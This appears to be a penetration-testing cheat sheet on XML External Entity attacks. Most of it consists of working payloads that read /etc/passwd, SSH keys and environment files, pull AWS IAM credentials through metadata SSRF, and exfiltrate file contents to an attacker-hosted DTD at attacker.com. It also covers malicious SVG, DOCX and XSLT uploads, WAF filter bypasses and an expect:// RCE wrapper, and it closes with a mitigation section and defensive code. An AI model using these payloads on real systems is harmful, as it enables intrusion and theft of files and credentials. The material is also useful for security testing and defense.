1. Classic XXE — Local File Read
The classic XXE payload defines an external entity whose system identifier is a local file path using the file:// URI scheme. When the XML parser resolves the entity and the application reflects the entity's value in its response, the file contents are returned to the attacker.
POST /api/xml-parse HTTP/1.1
Host: target.com
Content-Type: application/xml
Cookie: session=masaaki_session_token

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInput>
<username>&xxe;</username>
</userInput>
--- Response ---
HTTP/1.1 200 OK
{
"error": "Invalid username: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."
}
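Whether this payload succeeds depends entirely on how the target's parser is configured. As a point of comparison, here is a minimal sketch using Python's standard-library xml.etree.ElementTree, which does not expand external entities and raises ParseError when it meets one. The helper name try_parse is hypothetical and exists only for this illustration.

```python
import xml.etree.ElementTree as ET

# Same shape as the request body above.
PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInput>
<username>&xxe;</username>
</userInput>"""


def try_parse(xml_bytes: bytes) -> str:
    """Hypothetical helper: report whether ElementTree accepts the document."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        # ElementTree refuses the external entity instead of reading the file.
        return f"rejected: {exc}"
    return f"parsed: {root.findtext('username')!r}"


if __name__ == "__main__":
    print(try_parse(PAYLOAD))
    print(try_parse(b"<userInput><username>bob</username></userInput>"))
```

A target is only vulnerable when its parser behaves differently from this one, that is, when it fetches the system identifier and substitutes the result into the document.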
Other High-Value File Paths
# Linux
file:///etc/passwd
file:///etc/shadow # Requires root
file:///etc/hosts
file:///etc/nginx/nginx.conf
file:///var/www/html/.env
file:///proc/self/environ # App environment variables (DB passwords, API keys)
file:///proc/self/cmdline
file:///home/ubuntu/.ssh/id_rsa
file:///home/masaaki/.ssh/authorized_keys
file:///app/config.py
file:///app/settings.py
# Windows
file:///C:/Windows/win.ini
file:///C:/inetpub/wwwroot/web.config
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa
2. XXE SSRF — Internal HTTP Requests
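External entities can reference http:// URLs as well as file:// paths. The XML parser fetches the URL server-side, which makes this SSRF triggered through XXE. Combined with cloud metadata endpoints, it is a critical finding. The AWS example below works against IMDSv1 only; IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot issue.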
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>
--- Response contains ---
prod-ec2-role
# Follow up — fetch the credentials:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role">
--- Response contains AWS credentials ---
{
"AccessKeyId": "ASIA3X...",
"SecretAccessKey": "wJalrX...",
"Token": "AQoX..."
}
# Internal service enumeration via XXE-SSRF:
<!ENTITY xxe SYSTEM "http://10.0.0.1:6379/">
# Redis banner: -ERR wrong number of arguments
3. Blind XXE — Out-of-Band via DNS
When the application parses XML but does not reflect entity values in its response, classic XXE appears to fail. However, the parser still resolves entities and makes outbound connections. An out-of-band DNS lookup confirms the vulnerability even with zero response reflection.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://r7k2z9x8.oastify.com/">
]>
<root><data>&xxe;</data></root>
--- Collaborator receives ---
DNS: r7k2z9x8.oastify.com from 54.203.xx.xx
HTTP: GET / HTTP/1.1 Host: r7k2z9x8.oastify.com
User-Agent: Java/11.0.14
# Confirmed blind XXE — now escalate to data exfiltration
# using external DTD technique (next section)
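The DNS and HTTP callbacks together confirm that:
- The XML parser processes external entities
- The server can resolve external hostnames and make outbound HTTP requests
- The egress firewall does not block outbound connections on port 80
A DNS lookup with no follow-up HTTP request confirms only entity processing and outbound DNS resolution.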
4. Blind XXE — Data Exfiltration via External DTD
Reading a file through a blind XXE channel requires two components: a parameter entity that reads the file, and a second entity whose URL carries the file contents to the attacker in an HTTP request. The obstacle is that the XML specification forbids parameter entity references inside markup declarations in the internal DTD subset. In an external DTD they are allowed, so the entity definitions are hosted externally.
Host this DTD file at https://attacker.com/exfil.dtd:
<!-- exfil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
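<!-- &#x25; is the character reference for %, which cannot appear literally inside an entity value -->
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'https://attacker.com/collect?data=%file;'>">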
%wrap;
%send;
Then submit this XML to the target:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "https://attacker.com/exfil.dtd">
%dtd;
]>
<root><data>trigger</data></root>
--- Attacker server receives ---
GET /collect?data=root:x:0:0:root:/root:/bin/bash%0adaemon:x:1:1:... HTTP/1.1
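Note: newlines and other special characters in the file can break the exfiltration URL, and some parsers refuse to request such URLs. Base64-encode the content first (php://filter/convert.base64-encode/resource=/etc/passwd) if PHP is the backend.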
PHP Filter Wrapper for Clean Exfiltration
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'https://attacker.com/b64?d=%file;'>">
%wrap;
%send;
# Attacker receives clean base64 — decode locally:
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d
5. Error-Based XXE
When outbound exfiltration requests are blocked or unreliable, error-based XXE is an in-band alternative. The technique triggers an XML parse error whose message contains the file contents. It requires that the application return verbose parser error messages.
<!-- Host on attacker server: error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY &#x25; boom SYSTEM 'file:///nonexistent/%file;'>">
%error;
%boom;
<!-- XXE payload to target: -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "https://attacker.com/error.dtd">
%dtd;
]>
<root/>
--- Response error message ---
XML parse error: file not found:
/nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
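The file contents appear in the error path, so no outbound exfiltration request is needed. The payload above still fetches error.dtd from the attacker's server, however. Under strict egress filtering, the same declarations have to be introduced by redefining an entity from a DTD file that already exists on the target's filesystem.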
6. XXE via XInclude
XInclude is an XML specification that allows one XML document to include another. When you do not control the XML document's DOCTYPE declaration (e.g., your input is embedded server-side into a larger XML structure), XInclude lets you inject file reads without a DOCTYPE entity.
POST /api/product/search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

query=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
--- Response ---
<result>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:...
</result>
parse="text" is critical — without it, the included file must be valid XML or parsing fails. Text mode reads arbitrary file content as a character data node.
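The difference between the two parse modes can be reproduced locally. The sketch below uses Python's standard-library xml.etree.ElementInclude against a temporary file that the script creates itself; the function names expand and demo are hypothetical, and the target application's XInclude processor may of course behave differently.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XI_INCLUDE = "{http://www.w3.org/2001/XInclude}include"


def expand(parse_mode: str, href: str) -> ET.Element:
    """Build <foo><xi:include .../></foo> and let ElementInclude resolve it."""
    root = ET.Element("foo")
    ET.SubElement(root, XI_INCLUDE, parse=parse_mode, href=href)
    ElementInclude.include(root)  # default loader opens href as a local path
    return root


def demo():
    """Return (text included via parse="text", whether parse="xml" failed)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "sample.txt")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("plain text, not XML: a < b\n")
        included = expand("text", path).text
        try:
            expand("xml", path)
            xml_failed = False
        except ET.ParseError:
            # The file is not well-formed XML, so XML-mode inclusion aborts.
            xml_failed = True
    return included, xml_failed


if __name__ == "__main__":
    print(demo())
```

In text mode the file body becomes character data of the parent element; in XML mode the same file aborts processing with a parse error.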
7. XXE via File Upload
SVG Files
SVG is XML. Any endpoint that accepts SVG uploads and processes them server-side (resizing, converting, validating) is an XXE surface.
<?xml version="1.0" standalone="yes"?>
<!-- malicious.svg: the XML declaration must stay on the first line of the file -->
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<text y="20">&xxe;</text>
</svg>
# Upload via multipart form, then trigger server-side processing
# (e.g., convert to PNG, generate thumbnail, validate dimensions)
DOCX / XLSX (Office Open XML)
Office documents are ZIP archives containing XML files. The main content is in word/document.xml (DOCX) or xl/workbook.xml (XLSX). Unzip, inject XXE, rezip, and upload.
# Unzip the DOCX
unzip original.docx -d docx_dir
# Edit word/document.xml: add a DOCTYPE immediately after the XML declaration, then reference the entity in the body:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document ...>
<w:body>
<w:p><w:r><w:t>&xxe;</w:t></w:r></w:p>
</w:body>
</w:document>
# Repack
cd docx_dir && zip -r ../malicious.docx . && cd ..
# Upload to "import document", "parse invoice", or "extract text" feature
OpenDocument Format (ODT)
# content.xml inside ODT ZIP:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE office:document-content [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<office:document-content ...>
<office:body>
<office:text>&xxe;</office:text>
</office:body>
</office:document-content>
8. XXE via XSLT Processing
XSLT (XSL Transformations) is XML-based. Many XSLT processors support external entities and the document() function, both of which can read local or remote files. If an application lets users supply XSLT stylesheets and the processor is not locked down, it is very likely exploitable.
<?xml version="1.0" encoding="UTF-8"?>
<!-- malicious.xsl: the XML declaration must stay on the first line of the file -->
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<output>&xxe;</output>
</xsl:template>
</xsl:stylesheet>
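<!-- Via the XSLT document() function: no DOCTYPE needed. -->
<!-- document() parses its target as XML, so point it at an XML file. -->
<!-- Plain-text files such as /etc/passwd need unparsed-text() (XSLT 2.0+). -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('file:///C:/inetpub/wwwroot/web.config')"/>
</xsl:template>
</xsl:stylesheet>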
<!-- SSRF via XSLT -->
<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/')"/>
9. XXE via Modified Content-Type
REST endpoints that normally accept JSON can sometimes be coerced into parsing XML by changing the Content-Type header. Some frameworks register XML deserializers alongside JSON and pick one based on the declared content type, so an endpoint documented as JSON-only may still accept XML.
# Original request:
POST /api/users HTTP/1.1
Content-Type: application/json

{"username": "masaaki", "email": "masaaki@example.com"}
# Modified request — swap Content-Type to XML:
POST /api/users HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<username>&xxe;</username>
<email>masaaki@example.com</email>
</root>
# Also try:
Content-Type: text/xml
Content-Type: application/rss+xml
Content-Type: application/atom+xml
10. XXE Filter Bypass Techniques
WAFs and input filters may block common XXE patterns like SYSTEM, DOCTYPE, or ENTITY. These techniques evade string-matching filters.
Encoding Tricks
# UTF-16 encoding — parser decodes before WAF sees the plaintext
# Convert payload to UTF-16-LE or UTF-16-BE
Content-Type: application/xml; charset=UTF-16
# Declare encoding in XML declaration:
<?xml version="1.0" encoding="UTF-16"?>
# UTF-7 (older parsers):
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo +AFs-
+ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
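Why the UTF-16 trick defeats string matching can be shown in a few lines. This is a minimal sketch, assuming a filter that searches the raw request bytes for ASCII keywords; naive_filter_blocks and parser_sees_doctype are hypothetical names, and the second function uses the standard-library expat bindings to ask a real parser what it sees.

```python
import xml.parsers.expat

# A harmless document with a DOCTYPE and an internal entity.
DOC = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<!DOCTYPE foo [<!ENTITY e "x">]>'
    "<root>&e;</root>"
)


def naive_filter_blocks(body: bytes) -> bool:
    """String-matching filter: looks for the ASCII bytes of the keywords."""
    return any(k in body for k in (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM"))


def parser_sees_doctype(body: bytes) -> bool:
    """Ask expat, which decodes the declared encoding before tokenizing."""
    found = []
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda *args: found.append(args[0])
    parser.Parse(body, True)
    return bool(found)


utf8_body = DOC.replace("UTF-16", "UTF-8").encode("utf-8")
utf16_body = DOC.encode("utf-16")  # byte-order mark plus two bytes per character

if __name__ == "__main__":
    for label, body in (("utf-8", utf8_body), ("utf-16", utf16_body)):
        print(label, naive_filter_blocks(body), parser_sees_doctype(body))
```

The same observation cuts both ways: a filter that wants to catch these payloads has to decode the document the way the parser will, or better, run the check inside the parser.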
Parameter Entity Indirection
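# Parameter entities still use the ENTITY keyword, so this does not help when
# ENTITY itself is blocked. It targets filters that match literal strings such
# as "file:///etc/passwd" by splitting the string across parameter entities.
# References inside entity values are only legal in an external DTD, so these
# declarations go in an attacker-hosted DTD, not the internal subset:
<!ENTITY % a "fil">
<!ENTITY % b "e:">
<!ENTITY % c "///etc/passwd">
<!ENTITY % decl "<!ENTITY xxe SYSTEM '%a;%b;%c;'>">
%decl;
# The document body then references &xxe; as usual.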
Protocol Alternatives
# PHP-specific wrappers (bypass file:// filter)
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
expect://id # PHP expect:// wrapper — RCE if enabled
# Java jar: scheme (reads entries inside archives; remote archives are downloaded first)
jar:file:///var/www/app/webapp.jar!/
jar:http://attacker.com/evil.jar!/
# netdoc:// (older Java)
netdoc:///etc/passwd
Bypassing Blocked DOCTYPE
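# If the literal string DOCTYPE is WAF-blocked, try variants that an
# intermediate layer may normalize or decode before the parser sees them.
# A conformant XML parser rejects all three as written:
<!doctype # lowercase (XML keywords are case-sensitive)
<!D&#x4F;CTYPE # character reference for O
<!DO%43TYPE # URL-encoding (if double-decoded)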
# Whitespace injection — some WAFs tokenize on space:
<!DOCTYPE
foo
[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
11. Prevention & Mitigations
Disable external entity processing
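The primary fix is to disable DTD processing and external entity resolution in the XML parser. In Java: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). In Python lxml: construct the parser with resolve_entities=False. In PHP: libxml_disable_entity_loader(true) on PHP 7 and earlier. The function is deprecated as of PHP 8.0, where external entity loading is disabled by default, so the remaining risk there is code that passes LIBXML_NOENT.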
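For parsers that offer no switch to forbid DTDs, the same policy can be approximated with a pre-check. The following is a minimal sketch using only the Python standard library: it runs the input through expat once, aborts at the first DOCTYPE, and only then hands the bytes to ElementTree. The names DoctypeForbidden and parse_untrusted are hypothetical; the third-party defusedxml package offers a maintained implementation of the same idea.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""


def parse_untrusted(data: bytes) -> ET.Element:
    """Reject any document with a DOCTYPE, then parse it normally."""

    def forbid(name, system_id, public_id, has_internal_subset):
        # No DOCTYPE means no entity declarations, internal or external.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid
    checker.Parse(data, True)  # raises DoctypeForbidden or ExpatError
    return ET.fromstring(data)


if __name__ == "__main__":
    print(parse_untrusted(b"<r><u>bob</u></r>").findtext("u"))
    try:
        parse_untrusted(
            b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b"<r>&xxe;</r>"
        )
    except DoctypeForbidden as exc:
        print("blocked:", exc)
```

Parsing twice costs some CPU time, which is the trade-off for not depending on parser internals. Because the check runs inside a real parser, it is not fooled by alternate encodings the way a byte-level string match would be.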
Use safe parser configurations
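For Java SAX parsers, explicitly set XMLConstants.FEATURE_SECURE_PROCESSING to true, and set the XMLConstants.ACCESS_EXTERNAL_DTD and XMLConstants.ACCESS_EXTERNAL_SCHEMA properties to empty strings. FEATURE_SECURE_PROCESSING on its own may not disable external entities in every implementation, so combine it with the settings above. For .NET, use XmlReaderSettings with DtdProcessing = DtdProcessing.Prohibit.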
Prefer JSON or protocol buffers
Where XML is not a hard requirement, switch to JSON or protobuf. JSON parsers have no concept of external entities. Removing the XML attack surface entirely is the most reliable mitigation.
Validate and sandbox file uploads
Process uploaded Office/SVG files in an isolated sandbox with no network access and no filesystem read privileges outside a designated directory. Use a dedicated microservice with a stripped-down container that has no credentials or sensitive files accessible.
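As an additional pre-processing step inside that sandbox, uploaded archives can be screened before any document library touches them. The sketch below is one possible approach, assuming that legitimate Office Open XML and ODT parts are not expected to carry a DOCTYPE: it walks the ZIP, runs each XML part through expat, and flags parts that declare one. The function name parts_with_doctype and the MAX_PART_BYTES limit are assumptions made for this illustration.

```python
import io
import xml.parsers.expat
import zipfile

MAX_PART_BYTES = 10 * 1024 * 1024  # assumed limit; also guards against zip bombs


def parts_with_doctype(archive_bytes: bytes) -> list:
    """Return the names of XML parts that should be treated as suspicious."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_PART_BYTES:
                flagged.append(info.filename)  # too large to inspect safely
                continue
            seen = []
            parser = xml.parsers.expat.ParserCreate()
            parser.StartDoctypeDeclHandler = lambda *a, s=seen: s.append(True)
            try:
                parser.Parse(zf.read(info), True)
            except xml.parsers.expat.ExpatError:
                flagged.append(info.filename)  # malformed XML: reject as well
                continue
            if seen:
                flagged.append(info.filename)
    return flagged


if __name__ == "__main__":
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", '<!DOCTYPE foo [<!ENTITY e "x">]><d>&e;</d>')
        zf.writestr("word/styles.xml", "<styles/>")
    print(parts_with_doctype(buf.getvalue()))
```

An upload with a non-empty result can be rejected outright. This complements the sandbox rather than replacing it, since it only covers the DOCTYPE-based techniques.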
Network egress filtering
Even when XXE is present, restricting outbound network access prevents OOB data exfiltration. Ensure application servers cannot make arbitrary outbound HTTP/DNS requests. This reduces blind XXE to error-based only (which requires verbose errors to be useful).
Audit all Content-Type paths
Ensure REST endpoints reject unexpected Content-Types. Return HTTP 415 Unsupported Media Type for application/xml if only JSON is intended. Configure frameworks to not fall back to XML parsing when the declared type is application/json.
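A framework-independent sketch of that check follows. It assumes the handler can read the raw Content-Type header before any body parsing happens; the function name is_allowed_content_type and the default allowlist are hypothetical.

```python
def is_allowed_content_type(header_value, allowed=("application/json",)):
    """Return True only when the declared media type is explicitly allowed."""
    # Drop parameters such as "; charset=utf-8" and normalize case.
    media_type = (header_value or "").split(";", 1)[0].strip().lower()
    return media_type in allowed


if __name__ == "__main__":
    for value in ("application/json; charset=utf-8", "application/xml", None):
        status = 200 if is_allowed_content_type(value) else 415
        print(repr(value), status)
```

The allowlist is deliberately exact: a missing header, text/xml, and the +xml variants all fall through to 415 instead of reaching a parser.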